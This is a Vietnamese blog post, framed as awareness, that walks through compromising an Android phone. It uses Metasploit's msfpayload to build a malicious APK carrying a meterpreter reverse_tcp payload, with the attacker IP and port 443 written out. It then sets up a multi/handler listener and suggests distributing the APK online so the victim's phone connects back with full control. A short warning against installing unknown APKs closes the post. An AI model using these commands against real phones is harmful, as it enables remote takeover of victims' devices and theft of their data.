Monday , 22 October 2018
Home » Bảo Mật » Hack điện thoại

Hack điện thoại

hacking-android

Hack điện thoại

Bài viết chỉ giới thiệu về cách mà kẻ tấn công thường hay dung để tấn công nạn nhân. Từ đó chúng ta cẩn thận hơn khi cho ai đó mượn mobi, hay con cái tải các phần mềm miễn phí không rõ nguồn gốc. và đề phòng, chứ không chịu trách nhiệm về việc bạn thử nghiệm chúng.

Ngày nay người sử dụng điện thoại di động đang ngày càng gia tăng, các mối đe dọa an ninh cũng đang tăng lên cùng với sự phát triển của người sử dụng.

Hôm nay chúng tôi giới thiệu Hacking điện thoại thông minh Android sử dụng Metasploit Tutorial.

Tại sao chúng ta chọn điện thoại Android cho hướng dẫn này? đơn giản chỉ vì điện thoại android gần đây phát triển rất nhanh trên toàn thế giới. Ở Trung Quốc, bạn có thể có được điện thoại android cho chỉ chưa tới nữa triệu đồng đó là một trong những lý do tại sao Android đang phát triển nhanh chóng.

Android là một hệ điều hành dựa trên nhân Linux, và được thiết kế chủ yếu cho các thiết bị di động màn hình cảm ứng như điện thoại thông minh và máy tính bảng.

Ban đầu được phát triển bởi Android, Inc., mà Google hỗ trợ về tài chính và sau đó được mua vào năm 2005, Android đã được công bố vào năm 2007 cùng với sự thành lập của Open Handset Alliance:

APK là gì? theo wikipedia:

Là tập tin ứng dụng Android (APK) là định dạng tập tin được sử dụng để phân phối và cài đặt trên hệ điều hành Android; Nó rất giống với một gói MSI trong Windows hoặc một gói Deb trong hệ điều hành Debian-based như Ubuntu.

Dưới đây là một số thông tin ban đầu cho hướng dẫn này:

Địa chỉ IP của kẻ tấn công: 192.168.8.94

Cổng của kẻ tấn công nhận kết nối: 443

Yêu cầu:

1. Metasploit framework (chúng tôi sử dụng Kali Linux 1.0.6 trong hướng dẫn này)

2. Smartphone hệ điều hành Android (chúng tôi sử dụng HTC One Android 4.4 KitKat)

Các bước Hacking Android  sử dụng Metasploit:

1. Mở đầu cuối (CTRL + ALT + T)

2. Chúng tôi sẽ sử dụng Payload của Metasploit để tạo tạo Exploit cho hướng dẫn này.

Code:

msfpayload android / Meterpreter / reverse_tcp LHOST = <ip_của kẻ tấn công> LPORT = <Cổng nhận kết nối>

android_hack1

Như đã mô tả ở trên mà kẻ tấn công có địa chỉ IP là 192.168.8.94, dưới đây là ảnh chụp màn hình của chúng tôi khi thực hiện lệnh trên Kali Linux

3. Bởi vì Payload của chúng tôi là reverse_tcp Do vậy kẻ tấn công phải chờ kết nối từ nạn nhân cài đặt ứng dung do kẻ tấn công phân phối trên mạng hoặc bang những cách khác nhau.

android_hack2

use exploit/multi/handler 

set payload android/meterpreter/reverse_tcp

4. Các bước tiếp theo chúng ta cần phải cấu hình chuyển đổi cho các Payload của Metasploit mà chúng tôi đã xác định trong bước 3

android_hack3

Code:

set lhost 192.168.8.94 –>Địa chỉ IP address

set lport 443 –> Cổng lắng nghe kết nối

exploit –> Bắt đầu lắng nghe kết nối ừ phía nạn nhân

 

5. Kẻ tấn công đã tạo code của APK và bây giờ sẽ bắt đầu phân phối nó (tôi không cần phải mô tả làm thế nào để phân phối các tập tin này, tốt nhất là qua Internet.

6. Người bị tấn công (có thể là tôi) tải về các tập tin APK độc hại này và cài đặt nó. Sau khi nạn nhân mở các ứng dụng, giao diện điều khiển tấn công Metasploit có được kết nốinhư thế này:

android_hack4

7. Nó có nghĩa là kẻ tấn công đó đã vào được bên trong điện thoại thông minh Android của nạn nhân và kẻ này có thể làm tất cả mọi thứ với điện thoại của nạn nhân

android_hack5

Kết luận:

1. Không cài đặt APK từ các nguồn không rõ ràng.

2. Nếu bạn thực sự muốn cài đặt APK từ nguồn không rõ ràng, chắc chắn rằng bạn có thể xem, đọc và kiểm tra mã nguồn. Những hình ảnh dưới đây là mã nguồn độc hại apk của chúng tôi trong hướng dẫn này.

android_hack6

Chia sẻ bài viết này nếu bạn thấy nó hữu ích

Xem thêm:

Công cụ gián điệp theo dõi trên các loại điện thoại thông minh

Tìm điện thoại thất lạc và xóa dữ liệu trên Android

Lượt xem (5510)

About Nhat MInh

Nhat MInh
Love Computer

Xem thêm

CÁC KIẾN THỨC VỀ TẤN CÔNG TỪ CHỐI DỊCH VỤ (DOS/DDOS)

Liệu rằng website của bạn có xử lý được lưu lượng truy cập gia tăng đột …

Để lại bình luận:

Loading Facebook Comments ...

Leave a Reply

Your email address will not be published. Required fields are marked *